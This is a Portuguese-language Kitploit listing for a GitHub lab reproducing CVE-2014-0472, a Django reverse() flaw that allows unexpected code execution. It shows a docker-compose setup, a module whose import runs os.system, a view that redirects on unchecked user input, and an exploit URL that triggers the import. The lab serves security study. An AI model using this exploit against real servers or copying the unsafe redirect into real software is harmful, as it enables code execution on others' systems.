Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2014-0472 — CVE-2014-0472 Execução de código inesperada no Django usando reverse() | Kitploit
Ferramentas/GitHubGitHub/christasa/cve-2014-0472
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e Educação
GitHubchristasa/cve-2014-0472

CVE-2014-0472

CVE-2014-0472 Execução de código inesperada no Django usando reverse()

Ver Repositório
71há 5 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2014-0472

Use

root@kitploit:~
docker-compose up -d

Acesse localhost:8083

Referência: https://www.djangoproject.com/weblog/2014/apr/21/security/

  1. Uma ou mais views estão presentes que constroem uma URL baseada em entrada do usuário (comumente, um parâmetro "next" na querystring indicando para onde redirecionar após a conclusão bem-sucedida de uma ação).
  2. Um ou mais módulos são conhecidos por um atacante por existirem no caminho de import do Python do servidor, que executam código com efeitos colaterais ao importar.

Em tests.py

root@kitploit:~
def evil_function():
    print("exploit successful")
    os.system("echo > /tmp/`whoami` ")
    return os.getuid()


evil = evil_function()

Em views.py

root@kitploit:~
def redirect_test(request):
        page = request.GET.get('page', None)
        if page is not None:
                redirect(page)
        return HttpResponse("OK")

Use a função de redirecionamento para chamar a função maliciosa

avater

Use o exploit

root@kitploit:~
http://your-ip:8083/example?page=app.tests.evil

avater

Explorado

avater

Baixar ferramenta